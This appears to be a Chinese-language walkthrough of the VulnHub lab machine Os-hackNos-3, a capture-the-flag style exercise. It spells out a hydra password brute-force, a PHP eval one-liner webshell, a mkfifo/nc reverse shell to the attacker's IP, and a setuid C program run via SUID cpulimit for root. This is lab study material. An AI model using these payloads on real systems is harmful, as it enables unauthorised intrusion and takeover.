kali ip:192.168.3.238
target ip:192.168.1.202
靶机下载:hackNos: Os-hackNos-3 ~ VulnHub
靶机目标:普通用户的user.txt和root用户的root.txt
一、信息收集
1.主机发现
arp-scan -l #因为用的桥接,所以能扫描到别的主机
发现靶机IP:192.168.3.47
2.端口扫描
步骤一:使用nmap进行网络扫描,发现目标192.168.3.47为入侵目标靶机...
nmap -sS -A -T5 192.168.3.47 -O
2.目录扫描
步骤二:使用dirsearch进行目录扫描
dirsearch -u http://192.168.3.47
发现路径: http://192.168.3.47/scripts/
先访问http://192.168.3.47/scripts/发现第一个点击后返回网页根目录,除了automail.pl能访问外,其它的都不能访问,并且automail.pl里面没有比较有用的信息
那么我们选择访问http://192.168.3.47/websec发现一个博客
按照传统习惯,访问admin,发现一个后台登录,这里需要输入邮件 密码登录,在http://192.168.53.47/websec底部发现一个邮箱,猜测它是管理员账户
二、漏洞探测
在http://192.168.3.47/websec/中获取可能的密码口令
cewl http://192.168.5.134/websec/ > cewl.txt
#使用hydra爆破密码
hydra -l contact@hacknos.com -P cewl.txt 192.168.3.47 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong email or password" -V
得到密码
[80][http-post-form] host: 192.168.3.47 login: contact@hacknos.com password: Securityx
使用该密码登录进入后台,发现文件上传点
在上传文件后,发现文件被上传到了assets目录,在该目录中发现了.htaccess文件禁止访问php文件,那么将deny from all删除后保存。
然后使用菜刀等webshell工具连接一句话木马,这里的php.php的文件内容为
<?php @eval($_POST['romantic']);?>
这里使用蚁剑连接。
http://192.168.3.47/websec/assets/php.php passed:romantic
三、提权
这只是普通用户权限
试试suid提权
先在本地使用nc监听
nc -lvnp 9898
在webshell中输入
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash 2>&1|nc 192.168.3.238 9898 >/tmp/f
其中192.168.3.238是攻击机kali的ip
SUID权限可执行文件,发现一个之前没有见过的cpulimit。到https://gtfobins.github.io/gtfobins/上搜了一下,发现可以通过cpulimit -l 100 -f /bin/sh得到一个shell 。。。
cpulimit是一款用于控制CPU使用率的工具。参数-f可执行命令。
常见的SUID提权可执行文件
nmap
vim
less
more
nano
cp
mv
find
wget
bash
尝试用cpulimit提权
在本地kali里面使用vim cpu.c进行编辑
#include<stdio.h>
#include<unistd.h>
#include<stdlib.h>
int main()
{
setuid(0);
setgid(0);
system("/bin/bash");
return 0;
}
使用gcc cpu.c -o exp编译为exp,上传之后使用chmod +x exp添加运行权限,使用cpulimit -l 100 -f ./exp进行提权
www-data@hacknos:/var/www/html/websec/assets$ ls
ls
cpuexp cpuexp2 cpulimit.exp cpulimit2exp exp gila-logo.png php.php
www-data@hacknos:/var/www/html/websec/assets$ chmod +x exp
chmod +x exp
www-data@hacknos:/var/www/html/websec/assets$ cpulimit -l 100 -f ./exp
cpulimit -l 100 -f ./exp
Process 4887 detected
root@hacknos:/var/www/html/websec/assets#
这里拿不到最高权限,还是换一种方法
cat /var/local/database
Expenses
Software Licenses,$2.78
Maintenance,$68.87
Mortgage Interest,$70.35
Advertising,$9.78
Phone,$406.80
Insurance,$9.04
Opss;fackespreadsheet
- 切换到home目录下发现存在账户blackdevil用户
- 在/var/local/database文件中发现存在加密值
https://www.spammimic.com/spreadsheet.php #解码网站
得到
blackdevil/Security@x@
- 登录blackdevil用户进行su切换
python -c 'import pty;pty.spawn("/bin/bash")'
- sudo -l查询sudo权限为ALL 直接sudo su执行得到root用户权限..